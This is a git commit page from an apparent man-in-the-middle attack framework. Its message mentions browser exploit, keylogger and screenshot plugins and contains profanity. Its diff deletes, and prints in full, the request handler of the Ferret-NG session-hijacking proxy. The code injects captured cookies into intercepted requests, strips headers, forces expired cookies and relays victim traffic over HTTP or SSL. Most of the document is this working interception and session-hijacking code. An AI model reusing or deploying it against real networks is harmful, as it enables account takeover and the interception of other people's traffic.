This commit is just to push the changes so far to github , still have to tidy things up here and there and fix some bugs (also I really hate javascript)

JavaPwn plugin has been renamed to BrowserSniper (cause it now supports java, flash and browser exploits), it's been completly re-written along with it's config file section Addition of the screenshotter plugin, currently there is a bug when decoding the base64 encoded png files (a very wierd one) , but other than that it works (did i mention i hate js?) Jskeylogger's javscript now works on every browser except FF mobile (have no clue what's with that) p.s. did i mention i hate JS? Plugins that deal with javascript now read it from a file as supposed to having it built in (encoding issues) fu javascript User agent parsing is now built in and handled by core/httpagentparser.py, this because the user-agent library is a pain to install on some distros , also removes 3-4 deps which is a plus also fuck javascript
2025-07-16 10:03:52 -07:00 · 2015-05-16 00:43:56 +02:00 · 2015-05-16 00:43:56 +02:00 · ff39a302f9
commit ff39a302f9
parent 86870b8b72
32 changed files with 4378 additions and 681 deletions
--- a/core/ferretNG/ClientRequest.py
+++ b/core/ferretNG/ClientRequest.py
@ -1,168 +0,0 @@
-# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
-#
-# This program is free software; you can redistribute it and/or
-# modify it under the terms of the GNU General Public License as
-# published by the Free Software Foundation; either version 3 of the
-# License, or (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
-# USA
-#
-
-import urlparse 
-import logging 
-import os 
-import sys 
-import random
-import re
-
-from twisted.web.http import Request
-from twisted.web.http import HTTPChannel
-from twisted.web.http import HTTPClient
-
-from twisted.internet import ssl
-from twisted.internet import defer
-from twisted.internet import reactor
-from twisted.internet.protocol import ClientFactory
-
-from ServerConnectionFactory import ServerConnectionFactory
-from ServerConnection import ServerConnection
-from SSLServerConnection import SSLServerConnection
-from URLMonitor import URLMonitor
-from CookieCleaner import CookieCleaner
-from DnsCache import DnsCache
-
-mitmf_logger = logging.getLogger('mitmf')
-
-class ClientRequest(Request):
-
-    ''' This class represents incoming client requests and is essentially where
-    the magic begins.  Here we remove the client headers we dont like, and then
-    respond with either favicon spoofing, session denial, or proxy through HTTP
-    or SSL to the server.
-    '''
-
-    def __init__(self, channel, queued, reactor=reactor):
-        Request.__init__(self, channel, queued)
-        self.reactor       = reactor
-        self.urlMonitor    = URLMonitor.getInstance()
-        self.cookieCleaner = CookieCleaner.getInstance()
-        self.dnsCache      = DnsCache.getInstance()
-        #self.uniqueId      = random.randint(0, 10000)
-
-    def cleanHeaders(self):
-        headers = self.getAllHeaders().copy()
-
-        if 'accept-encoding' in headers:
-             del headers['accept-encoding']
-             mitmf_logger.debug("[Ferret-NG] [ClientRequest] Zapped encoding")
-
-        if 'if-modified-since' in headers:
-            del headers['if-modified-since']
-
-        if 'cache-control' in headers:
-            del headers['cache-control']
-
-        if 'host' in headers:
-            if headers['host'] in self.urlMonitor.cookies:
-                mitmf_logger.info("[Ferret-NG] Hijacking session for host: {}".format(headers['host']))
-                headers['cookie'] = self.urlMonitor.cookies[headers['host']]
-
-        return headers
-
-    def getPathFromUri(self):
-        if (self.uri.find("http://") == 0):
-            index = self.uri.find('/', 7)
-            return self.uri[index:]
-
-        return self.uri   
-
-    def handleHostResolvedSuccess(self, address):
-        mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
-        host              = self.getHeader("host")
-        headers           = self.cleanHeaders()
-        client            = self.getClientIP()
-        path              = self.getPathFromUri()
-        url               = 'http://' + host + path
-        self.uri = url # set URI to absolute
-
-        if self.content:
-            self.content.seek(0,0)
-        
-        postData = self.content.read()
-
-        hostparts = host.split(':')
-        self.dnsCache.cacheResolution(hostparts[0], address)
-
-        if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
-            mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending expired cookies")
-            self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
-
-        elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
-            if 'securelink' in headers:
-                del headers['securelink']
-            
-            mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via SSL ({})".format((client,url)))
-            self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
-        
-        else:
-            mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via HTTP")
-            #self.proxyViaHTTP(address, self.method, path, postData, headers)
-            port = 80
-            if len(hostparts) > 1:
-                port = int(hostparts[1])
-
-            self.proxyViaHTTP(address, self.method, path, postData, headers, port)
-
-    def handleHostResolvedError(self, error):
-        mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host resolution error: {}".format(error))
-        try:
-            self.finish()
-        except:
-            pass
-
-    def resolveHost(self, host):
-        address = self.dnsCache.getCachedAddress(host)
-
-        if address != None:
-            mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host cached: {} {}".format(host, address))
-            return defer.succeed(address)
-        else:
-            return reactor.resolve(host)
-
-    def process(self):
-        mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolving host: {}".format(self.getHeader('host')))
-        host = self.getHeader('host').split(":")[0]              
-
-        deferred = self.resolveHost(host)
-        deferred.addCallback(self.handleHostResolvedSuccess)
-        deferred.addErrback(self.handleHostResolvedError)
-        
-    def proxyViaHTTP(self, host, method, path, postData, headers, port):
-        connectionFactory          = ServerConnectionFactory(method, path, postData, headers, self)
-        connectionFactory.protocol = ServerConnection
-        #self.reactor.connectTCP(host, 80, connectionFactory)
-        self.reactor.connectTCP(host, port, connectionFactory)
-
-    def proxyViaSSL(self, host, method, path, postData, headers, port):
-        clientContextFactory       = ssl.ClientContextFactory()
-        connectionFactory          = ServerConnectionFactory(method, path, postData, headers, self)
-        connectionFactory.protocol = SSLServerConnection
-        self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
-
-    def sendExpiredCookies(self, host, path, expireHeaders):
-        self.setResponseCode(302, "Moved")
-        self.setHeader("Connection", "close")
-        self.setHeader("Location", "http://" + host + path)
-        
-        for header in expireHeaders:
-            self.setHeader("Set-Cookie", header)
-
-        self.finish()